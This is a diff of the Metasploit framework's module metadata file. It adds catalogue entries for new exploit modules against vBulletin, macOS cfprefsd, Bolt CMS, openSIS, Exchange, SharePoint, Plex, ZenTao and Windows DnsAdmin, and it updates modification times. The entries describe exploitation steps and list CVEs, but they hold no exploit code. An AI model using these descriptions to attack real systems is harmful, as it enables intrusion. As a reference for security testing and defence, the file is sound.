@@ -73098,7 +74420,7 @@
    "targets": [
      "Liferay Portal < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, 7.2.1 GA2"
    ],
-    "mod_time": "2020-04-22 10:44:07 +0000",
+    "mod_time": "2020-08-14 13:11:38 +0000",
    "path": "/modules/exploits/multi/http/liferay_java_unmarshalling.rb",
    "is_install_path": true,
    "ref_name": "multi/http/liferay_java_unmarshalling",
@@ -79398,7 +80720,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-06-02 19:16:35 +0000",
+    "mod_time": "2020-06-29 22:17:35 +0000",
    "path": "/modules/exploits/multi/http/vbulletin_getindexablecontent.rb",
    "is_install_path": true,
    "ref_name": "multi/http/vbulletin_getindexablecontent",
@@ -79464,6 +80786,66 @@
    },
    "needs_cleanup": null
  },
+  "exploit_multi/http/vbulletin_widget_template_rce": {
+    "name": "vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.",
+    "fullname": "exploit/multi/http/vbulletin_widget_template_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-08-09",
+    "type": "exploit",
+    "author": [
+      "Zenofex <zenofex@exploitee.rs>"
+    ],
+    "description": "This module exploits a logic bug within the template rendering code in vBulletin 5.x.\n          The module uses the vBulletin template rendering functionality to render the\n          'widget_tabbedcontainer_tab_panel' template while also providing the 'widget_php' argument.\n          This causes the former template to load the latter bypassing filters originally put in place\n          to address 'CVE-2019-16759'. This also allows the exploit to reach an eval call with user input\n          allowing the module to achieve PHP remote code execution on the target. This module has been\n          tested successfully on vBulletin version 5.6.2 on Ubuntu Linux.",
+    "references": [
+      "URL-https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/",
+      "CVE-2020-17496"
+    ],
+    "platform": "PHP,Unix,Windows",
+    "arch": "cmd, php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Meterpreter (PHP In-Memory)",
+      "Unix (CMD In-Memory)",
+      "Windows (CMD In-Memory)"
+    ],
+    "mod_time": "2020-08-14 08:25:57 +0000",
+    "path": "/modules/exploits/multi/http/vbulletin_widget_template_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/vbulletin_widget_template_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_multi/http/vbulletin_widgetconfig_rce": {
    "name": "vBulletin widgetConfig RCE",
    "fullname": "exploit/multi/http/vbulletin_widgetconfig_rce",
@@ -81725,11 +83107,11 @@
      "Mac OS X PPC (Native Payload)",
      "Mac OS X x86 (Native Payload)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-08-24 10:11:03 +0000",
    "path": "/modules/exploits/multi/misc/java_rmi_server.rb",
    "is_install_path": true,
    "ref_name": "multi/misc/java_rmi_server",
-    "check": false,
+    "check": true,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -82411,7 +83793,7 @@
      "Windows",
      "Unix"
    ],
-    "mod_time": "2020-06-02 14:24:18 +0000",
+    "mod_time": "2020-06-29 22:17:35 +0000",
    "path": "/modules/exploits/multi/misc/weblogic_deserialize_badattr_extcomp.rb",
    "is_install_path": true,
    "ref_name": "multi/misc/weblogic_deserialize_badattr_extcomp",
@@ -82455,7 +83837,7 @@
      "Windows",
      "Unix"
    ],
-    "mod_time": "2020-05-19 14:59:47 +0000",
+    "mod_time": "2020-06-29 22:17:35 +0000",
    "path": "/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb",
    "is_install_path": true,
    "ref_name": "multi/misc/weblogic_deserialize_badattrval",
@@ -83147,7 +84529,7 @@
    "targets": [
      "Samba 2.2.x Linux x86"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-13 16:34:47 +0000",
    "path": "/modules/exploits/multi/samba/nttrans.rb",
    "is_install_path": true,
    "ref_name": "multi/samba/nttrans",
@@ -83192,7 +84574,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-04 16:08:32 +0000",
    "path": "/modules/exploits/multi/samba/usermap_script.rb",
    "is_install_path": true,
    "ref_name": "multi/samba/usermap_script",
@@ -83897,7 +85279,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2019-12-22 08:46:43 +0000",
+    "mod_time": "2020-07-12 00:47:56 +0000",
    "path": "/modules/exploits/openbsd/local/dynamic_loader_chpass_privesc.rb",
    "is_install_path": true,
    "ref_name": "openbsd/local/dynamic_loader_chpass_privesc",
@@ -84467,6 +85849,50 @@
    },
    "needs_cleanup": null
  },
+  "exploit_osx/local/cfprefsd_race_condition": {
+    "name": "macOS cfprefsd Arbitrary File Write Local Privilege Escalation",
+    "fullname": "exploit/osx/local/cfprefsd_race_condition",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-03-18",
+    "type": "exploit",
+    "author": [
+      "Yonghwi Jin <jinmoteam@gmail.com>",
+      "Jungwon Lim <setuid0@protonmail.com>",
+      "Insu Yun <insu@gatech.edu>",
+      "Taesoo Kim <taesoo@gatech.edu>",
+      "timwr"
+    ],
+    "description": "This module exploits an arbitrary file write in cfprefsd on macOS <= 10.15.4 in\n          order to run a payload as root. The CFPreferencesSetAppValue function, which is\n          reachable from most unsandboxed processes, can be exploited with a race condition\n          in order to overwrite an arbitrary file as root. By overwriting /etc/pam.d/login\n          a user can then login as root with the `login root` command without a password.",
+    "references": [
+      "CVE-2020-9839",
+      "URL-https://github.com/sslab-gatech/pwn2own2020"
+    ],
+    "platform": "OSX",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Mac OS X x64 (Native Payload)"
+    ],
+    "mod_time": "2020-09-04 17:42:30 +0000",
+    "path": "/modules/exploits/osx/local/cfprefsd_race_condition.rb",
+    "is_install_path": true,
+    "ref_name": "osx/local/cfprefsd_race_condition",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": true
+  },
  "exploit_osx/local/dyld_print_to_file_root": {
    "name": "Apple OS X DYLD_PRINT_TO_FILE Privilege Escalation",
    "fullname": "exploit/osx/local/dyld_print_to_file_root",
@@ -85413,7 +86839,7 @@
    "targets": [
      "Samba 2.2.x - Bruteforce"
    ],
-    "mod_time": "2018-09-15 18:54:45 +0000",
+    "mod_time": "2020-05-13 16:34:47 +0000",
    "path": "/modules/exploits/osx/samba/trans2open.rb",
    "is_install_path": true,
    "ref_name": "osx/samba/trans2open",
@@ -85880,7 +87306,7 @@
      "Samba 2.2.x - Solaris 9 (sun4u) - Bruteforce",
      "Samba 2.2.x - Solaris 7/8 (sun4u) - Bruteforce"
    ],
-    "mod_time": "2018-09-15 18:54:45 +0000",
+    "mod_time": "2020-05-13 16:34:47 +0000",
    "path": "/modules/exploits/solaris/samba/trans2open.rb",
    "is_install_path": true,
    "ref_name": "solaris/samba/trans2open",
@@ -87834,7 +89260,7 @@
    "targets": [
      "OpenSMTPD < 6.6.4 (automatic grammar selection)"
    ],
-    "mod_time": "2020-04-10 02:01:15 +0000",
+    "mod_time": "2020-08-14 13:11:38 +0000",
    "path": "/modules/exploits/unix/local/opensmtpd_oob_read_lpe.rb",
    "is_install_path": true,
    "ref_name": "unix/local/opensmtpd_oob_read_lpe",
@@ -88329,7 +89755,7 @@
    "targets": [
      "OpenSMTPD < 6.6.1"
    ],
-    "mod_time": "2020-04-22 10:44:07 +0000",
+    "mod_time": "2020-08-14 13:11:38 +0000",
    "path": "/modules/exploits/unix/smtp/opensmtpd_mail_from_rce.rb",
    "is_install_path": true,
    "ref_name": "unix/smtp/opensmtpd_mail_from_rce",
@@ -89037,6 +90463,71 @@
    },
    "needs_cleanup": null
  },
+  "exploit_unix/webapp/bolt_authenticated_rce": {
+    "name": "Bolt CMS 3.7.0 - Authenticated Remote Code Execution",
+    "fullname": "exploit/unix/webapp/bolt_authenticated_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-05-07",
+    "type": "exploit",
+    "author": [
+      "Sivanesh Ashok",
+      "r3m0t3nu11",
+      "Erik Wynter"
+    ],
+    "description": "This module exploits multiple vulnerabilities in Bolt CMS version 3.7.0\n          and 3.6.* in order to execute arbitrary commands as the user running Bolt.\n\n          This module first takes advantage of a vulnerability that allows an\n          authenticated user to change the username in /bolt/profile to a PHP\n          `system($_GET[\"\"])` variable. Next, the module obtains a list of tokens\n          from `/async/browse/cache/.sessions` and uses these to create files with\n          the blacklisted `.php` extention via HTTP POST requests to\n          `/async/folder/rename`. For each created file, the module checks the HTTP\n          response for evidence that the file can be used to execute arbitrary\n          commands via the created PHP $_GET variable. If the response is negative,\n          the file is deleted, otherwise the payload is executed via an HTTP\n          get request in this format: `/files/<rogue_PHP_file>?<$_GET_var>=<payload>`\n\n          Valid credentials for a Bolt CMS user are required. This module has been\n          successfully tested against Bolt CMS 3.7.0 running on CentOS 7.",
+    "references": [
+      "EDB-48296",
+      "URL-https://github.com/bolt/bolt/releases/tag/3.7.1"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "x86, x64, cmd",
+    "rport": 8000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux (x86)",
+      "Linux (x64)",
+      "Linux (cmd)"
+    ],
+    "mod_time": "2020-07-01 14:43:15 +0000",
+    "path": "/modules/exploits/unix/webapp/bolt_authenticated_rce.rb",
+    "is_install_path": true,
+    "ref_name": "unix/webapp/bolt_authenticated_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "NOCVE": "0day",
+      "Stability": [
+        "service-resource-loss"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "config-changes",
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_unix/webapp/cacti_graphimage_exec": {
    "name": "Cacti graph_view.php Remote Command Execution",
    "fullname": "exploit/unix/webapp/cacti_graphimage_exec",
@@ -91746,6 +93237,59 @@
    },
    "needs_cleanup": null
  },
+  "exploit_unix/webapp/opensis_chain_exec": {
+    "name": "openSIS Unauthenticated PHP Code Execution",
+    "fullname": "exploit/unix/webapp/opensis_chain_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-06-30",
+    "type": "exploit",
+    "author": [
+      "EgiX"
+    ],
+    "description": "This module exploits multiple vulnerabilities in openSIS 7.4 and prior versions\n        which could be abused by unauthenticated attackers to execute arbitrary PHP code\n        with the permissions of the webserver. The exploit chain abuses an incorrect access\n        control issue which allows access to scripts which should require the user to be\n        authenticated, and a Local File Inclusion to reach a SQL injection vulnerability which\n        results in execution of arbitrary PHP code due to an unsafe use of the eval() function.",
+    "references": [
+      "URL-http://karmainsecurity.com/KIS-2020-06",
+      "URL-http://karmainsecurity.com/KIS-2020-07",
+      "URL-http://karmainsecurity.com/KIS-2020-08",
+      "CVE-2020-13381",
+      "CVE-2020-13382",
+      "CVE-2020-13383"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "openSIS <= 7.4"
+    ],
+    "mod_time": "2020-07-03 18:00:36 +0000",
+    "path": "/modules/exploits/unix/webapp/opensis_chain_exec.rb",
+    "is_install_path": true,
+    "ref_name": "unix/webapp/opensis_chain_exec",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_unix/webapp/opensis_modname_exec": {
    "name": "OpenSIS 'modname' PHP Code Execution",
    "fullname": "exploit/unix/webapp/opensis_modname_exec",
@@ -93325,7 +94869,7 @@
      "Unix Command",
      "Linux Dropper"
    ],
-    "mod_time": "2020-05-20 22:42:20 +0000",
+    "mod_time": "2020-08-14 13:11:38 +0000",
    "path": "/modules/exploits/unix/webapp/thinkphp_rce.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/thinkphp_rce",
@@ -94867,7 +96411,7 @@
    "targets": [
      "InfiniteWP Client < 1.9.4.5"
    ],
-    "mod_time": "2020-04-08 00:50:28 +0000",
+    "mod_time": "2020-08-14 13:11:38 +0000",
    "path": "/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/wp_infinitewp_auth_bypass",
@@ -111674,6 +113218,56 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/fileformat/documalis_pdf_editor_and_scanner": {
+    "name": "Documalis Free PDF Editor and Scanner JPEG Stack Buffer Overflow",
+    "fullname": "exploit/windows/fileformat/documalis_pdf_editor_and_scanner",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2020-05-22",
+    "type": "exploit",
+    "author": [
+      "metacom",
+      "metacom27 <metacom27@gmail.com>"
+    ],
+    "description": "Documalis Free PDF Editor version 5.7.2.26 and Documalis Free PDF Scanner version 5.7.2.122 do not\n          appropriately validate the contents of JPEG images contained within a PDF. Attackers can exploit\n          this vulnerability to trigger a buffer overflow on the stack and gain remote code execution as the\n          user running the Documalis Free PDF Editor or Documalis Free PDF Scanner software.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Documalis Free PDF Editor v.5.7.2.26 / Win 7, Win 10",
+      "Documalis Free PDF Scanner v.5.7.2.122 / Win 7, Win 10"
+    ],
+    "mod_time": "2020-08-03 13:06:45 +0000",
+    "path": "/modules/exploits/windows/fileformat/documalis_pdf_editor_and_scanner.rb",
+    "is_install_path": true,
+    "ref_name": "windows/fileformat/documalis_pdf_editor_and_scanner",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-service-down"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_windows/fileformat/dupscout_xml": {
    "name": "Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow",
    "fullname": "exploit/windows/fileformat/dupscout_xml",
@@ -121454,7 +123048,7 @@
      "Windows Dropper",
      "PowerShell Stager"
    ],
-    "mod_time": "2020-05-20 22:42:20 +0000",
+    "mod_time": "2020-08-14 13:11:38 +0000",
    "path": "/modules/exploits/windows/http/desktopcentral_deserialization.rb",
    "is_install_path": true,
    "ref_name": "windows/http/desktopcentral_deserialization",
@@ -121829,6 +123423,56 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/http/dlink_central_wifimanager_rce": {
+    "name": "D-Link Central WiFi Manager CWM(100) RCE",
+    "fullname": "exploit/windows/http/dlink_central_wifimanager_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-07-09",
+    "type": "exploit",
+    "author": [
+      "M3 <M3@ZionLab from DBAppSecurity>",
+      "Redouane NIBOUCHA <rniboucha@yahoo.fr>"
+    ],
+    "description": "This module exploits a PHP code injection vulnerability in D-Link Central WiFi Manager CWM(100)\n          versions below `v1.03R0100_BETA6`. The vulnerability exists in the\n          username cookie, which is passed to `eval()` without being sanitized.\n          Dangerous functions are not disabled by default, which makes it possible\n          to get code execution on the target.",
+    "references": [
+      "CVE-2019-13372",
+      "URL-https://unh3x.github.io/2019/02/21/D-link-(CWM-100)-Multiple-Vulnerabilities/"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-08-18 09:33:32 +0000",
+    "path": "/modules/exploits/windows/http/dlink_central_wifimanager_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/dlink_central_wifimanager_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_windows/http/dnn_cookie_deserialization_rce": {
    "name": "DotNetNuke Cookie Deserialization Remote Code Excecution",
    "fullname": "exploit/windows/http/dnn_cookie_deserialization_rce",
@@ -122524,6 +124168,72 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/http/exchange_ecp_dlp_policy": {
+    "name": "Microsoft Exchange Server DlpUtils AddTenantDlpPolicy RCE",
+    "fullname": "exploit/windows/http/exchange_ecp_dlp_policy",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-09-08",
+    "type": "exploit",
+    "author": [
+      "mr_me",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This vulnerability allows remote attackers to execute arbitrary code\n          on affected installations of Exchange Server. Authentication is\n          required to exploit this vulnerability. Additionally, the target user\n          must have the \"Data Loss Prevention\" role assigned and an active\n          mailbox.\n\n          If the user is in the \"Compliance Management\" or greater \"Organization\n          Management\" role groups, then they have the \"Data Loss Prevention\"\n          role. Since the user who installed Exchange is in the \"Organization\n          Management\" role group, they transitively have the \"Data Loss\n          Prevention\" role.\n\n          The specific flaw exists within the processing of the New-DlpPolicy\n          cmdlet. The issue results from the lack of proper validation of\n          user-supplied template data when creating a DLP policy. An attacker\n          can leverage this vulnerability to execute code in the context of\n          SYSTEM.\n\n          Tested against Exchange Server 2016 CU14 on Windows Server 2016.",
+    "references": [
+      "CVE-2020-16875",
+      "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16875",
+      "URL-https://support.microsoft.com/en-us/help/4577352/security-update-for-exchange-server-2019-and-2016",
+      "URL-https://srcincite.io/advisories/src-2020-0019/",
+      "URL-https://srcincite.io/pocs/cve-2020-16875.py.txt",
+      "URL-https://srcincite.io/pocs/cve-2020-16875.ps1.txt"
+    ],
+    "platform": "Windows",
+    "arch": "x86, x64",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Exchange Server 2016 and 2019 w/o KB4577352"
+    ],
+    "mod_time": "2020-09-16 13:24:18 +0000",
+    "path": "/modules/exploits/windows/http/exchange_ecp_dlp_policy.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/exchange_ecp_dlp_policy",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "account-lockouts",
+        "config-changes",
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_windows/http/exchange_ecp_viewstate": {
    "name": "Exchange Control Panel ViewState Deserialization",
    "fullname": "exploit/windows/http/exchange_ecp_viewstate",
@@ -126986,7 +128696,7 @@
      "Windows Dropper",
      "PowerShell Stager"
    ],
-    "mod_time": "2020-05-22 16:53:44 +0000",
+    "mod_time": "2020-08-14 13:11:38 +0000",
    "path": "/modules/exploits/windows/http/plesk_mylittleadmin_viewstate.rb",
    "is_install_path": true,
    "ref_name": "windows/http/plesk_mylittleadmin_viewstate",
@@ -127007,6 +128717,70 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/http/plex_unpickle_dict_rce": {
+    "name": "Plex Unpickle Dict Windows RCE",
+    "fullname": "exploit/windows/http/plex_unpickle_dict_rce",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2020-05-07",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "Chris Lyne"
+    ],
+    "description": "This module exploits an authenticated Python unsafe pickle.load of a Dict file.  An authenticated attacker\n          can create a photo library and add arbitrary files to it.  After setting the Windows only Plex variable\n          LocalAppDataPath to the newly created photo library, a file named Dict will be unpickled, which causes\n          an RCE as the user who started Plex.\n          Plex_Token is required, to get it you need to log-in through a web browser, then check the requests to grab\n          the X-Plex-Token header.  See info -d for additional details.\n          If an exploit fails, or is cancelled, Dict is left on disk, a new ALBUM_NAME will be required\n          as subsuquent writes will make Dict-1, and not execute.",
+    "references": [
+      "URL-https://github.com/tenable/poc/blob/master/plex/plex_media_server/auth_dict_unpickle_rce_exploit_tra_2020_32.py",
+      "URL-https://www.tenable.com/security/research/tra-2020-32",
+      "URL-http://support.plex.tv/articles/201105343-advanced-hidden-server-settings/",
+      "URL-https://forums.plex.tv/t/security-regarding-cve-2020-5741/586819",
+      "CVE-2020-5741"
+    ],
+    "platform": "Python",
+    "arch": "python",
+    "rport": 32400,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Target"
+    ],
+    "mod_time": "2020-07-27 15:35:05 +0000",
+    "path": "/modules/exploits/windows/http/plex_unpickle_dict_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/plex_unpickle_dict_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-service-restarts"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
+    "needs_cleanup": true
+  },
  "exploit_windows/http/privatewire_gateway": {
    "name": "Private Wire Gateway Buffer Overflow",
    "fullname": "exploit/windows/http/privatewire_gateway",
@@ -127613,6 +129387,69 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/http/sharepoint_data_deserialization": {
+    "name": "SharePoint DataSet / DataTable Deserialization",
+    "fullname": "exploit/windows/http/sharepoint_data_deserialization",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-07-14",
+    "type": "exploit",
+    "author": [
+      "Steven Seeley",
+      "Soroush Dalili",
+      "Spencer McIntyre"
+    ],
+    "description": "A remotely exploitable vulnerability exists within SharePoint that can be leveraged by a remote authenticated\n          attacker to execute code within the context of the SharePoint application service. The privileges in this\n          execution context are determined by the account that is specified when SharePoint is installed and configured.\n          The vulnerability is related to a failure to validate the source of XML input data, leading to an unsafe\n          deserialization operation that can be triggered from a page that initializes either the\n          ContactLinksSuggestionsMicroView type or a derivative of it. In a default configuration, a Domain User account\n          is sufficient to access SharePoint and exploit this vulnerability.",
+    "references": [
+      "CVE-2020-1147",
+      "URL-https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows EXE Dropper",
+      "Windows Command",
+      "Windows Powershell"
+    ],
+    "mod_time": "2020-07-29 16:08:51 +0000",
+    "path": "/modules/exploits/windows/http/sharepoint_data_deserialization.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/sharepoint_data_deserialization",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_windows/http/sharepoint_workflows_xoml": {
    "name": "SharePoint Workflows XOML Injection",
    "fullname": "exploit/windows/http/sharepoint_workflows_xoml",
@@ -127654,7 +129491,7 @@
      "Windows Command",
      "Windows Powershell"
    ],
-    "mod_time": "2020-03-24 17:14:47 +0000",
+    "mod_time": "2020-06-29 22:17:35 +0000",
    "path": "/modules/exploits/windows/http/sharepoint_workflows_xoml.rb",
    "is_install_path": true,
    "ref_name": "windows/http/sharepoint_workflows_xoml",
@@ -128304,7 +130141,7 @@
    "targets": [
      "Apache Tomcat 9.0 or prior for Windows"
    ],
-    "mod_time": "2019-08-02 09:48:53 +0000",
+    "mod_time": "2020-06-29 22:17:35 +0000",
    "path": "/modules/exploits/windows/http/tomcat_cgi_cmdlineargs.rb",
    "is_install_path": true,
    "ref_name": "windows/http/tomcat_cgi_cmdlineargs",
@@ -128885,6 +130722,58 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/http/zentao_pro_rce": {
+    "name": "ZenTao Pro 8.8.2 Remote Code Execution",
+    "fullname": "exploit/windows/http/zentao_pro_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-06-01",
+    "type": "exploit",
+    "author": [
+      "Daniel Monzón",
+      "Melvin Boers",
+      "Erik Wynter"
+    ],
+    "description": "This module exploits a command injection vulnerability in ZenTao Pro\n          8.8.2 and earlier versions in order to execute arbitrary commands with\n          SYSTEM privileges.\n\n          The module first attempts to authenticate to the ZenTao dashboard. It\n          then tries to execute the payload by submitting fake repositories via\n          the 'Repo Create' function that is accessible from the dashboard via\n          CI>Repo. More precisely, the module sends HTTP POST requests to\n          '/pro/repo-create.html' that inject commands in the vulnerable 'path'\n          parameter which corresponds to the 'Client Path' input field.\n\n          Valid credentials for a ZenTao admin account are required. This module\n          has been successfully tested against ZenTao 8.8.1 and 8.8.2 running on\n          Windows 10 (XAMPP server).",
+    "references": [
+      "EDB-48633",
+      "CVE-2020-7361"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows (x86)",
+      "Windows (x64)"
+    ],
+    "mod_time": "2020-07-22 09:40:25 +0000",
+    "path": "/modules/exploits/windows/http/zentao_pro_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/zentao_pro_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_windows/http/zenworks_assetmgmt_uploadservlet": {
    "name": "Novell ZENworks Asset Management Remote Execution",
    "fullname": "exploit/windows/http/zenworks_assetmgmt_uploadservlet",
@@ -131918,7 +133807,7 @@
    "targets": [
      "Windows x64"
    ],
-    "mod_time": "2020-06-11 13:09:25 +0000",
+    "mod_time": "2020-07-30 10:45:19 +0000",
    "path": "/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb",
    "is_install_path": true,
    "ref_name": "windows/local/cve_2020_0668_service_tracing",
@@ -131967,7 +133856,7 @@
    "targets": [
      "Windows DLL Dropper"
    ],
-    "mod_time": "2020-06-11 00:59:22 +0000",
+    "mod_time": "2020-06-29 22:17:35 +0000",
    "path": "/modules/exploits/windows/local/cve_2020_0787_bits_arbitrary_file_move.rb",
    "is_install_path": true,
    "ref_name": "windows/local/cve_2020_0787_bits_arbitrary_file_move",
@@ -132019,7 +133908,7 @@
    "targets": [
      "Windows 10 v1903-1909 x64"
    ],
-    "mod_time": "2020-04-16 02:04:17 +0000",
+    "mod_time": "2020-06-29 22:17:35 +0000",
    "path": "/modules/exploits/windows/local/cve_2020_0796_smbghost.rb",
    "is_install_path": true,
    "ref_name": "windows/local/cve_2020_0796_smbghost",
@@ -132036,6 +133925,58 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/local/dnsadmin_serverlevelplugindll": {
+    "name": "DnsAdmin ServerLevelPluginDll Feature Abuse Privilege Escalation",
+    "fullname": "exploit/windows/local/dnsadmin_serverlevelplugindll",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2017-05-08",
+    "type": "exploit",
+    "author": [
+      "Shay Ber",
+      "Imran E. Dawoodjee <imran@threathounds.com>"
+    ],
+    "description": "This module exploits a feature in the DNS service of Windows Server. Users of the DnsAdmins group can set the\n          `ServerLevelPluginDll` value using dnscmd.exe to create a registry key at `HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\\`\n          named `ServerLevelPluginDll` that can be made to point to an arbitrary DLL. After doing so, restarting the service\n          will load the DLL and cause it to execute, providing us with SYSTEM privileges. Increasing WfsDelay is recommended\n          when using a UNC path.\n\n          Users should note that if the DLLPath variable of this module is set to a UNC share that does not exist,\n          the DNS server on the target will not be able to restart. Similarly if a UNC share is not utilized, and\n          users instead opt to drop a file onto the disk of the target computer, and this gets picked up by Anti-Virus\n          after the timeout specified by `AVTIMEOUT` expires, its possible that the `ServerLevelPluginDll` value of the\n          `HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\\` key on the target computer may point to an nonexistant DLL,\n          which will also prevent the DNS server from being able to restart. Users are advised to refer to the documentation for\n          this module for advice on how to resolve this issue should it occur.\n\n          This module has only been tested and 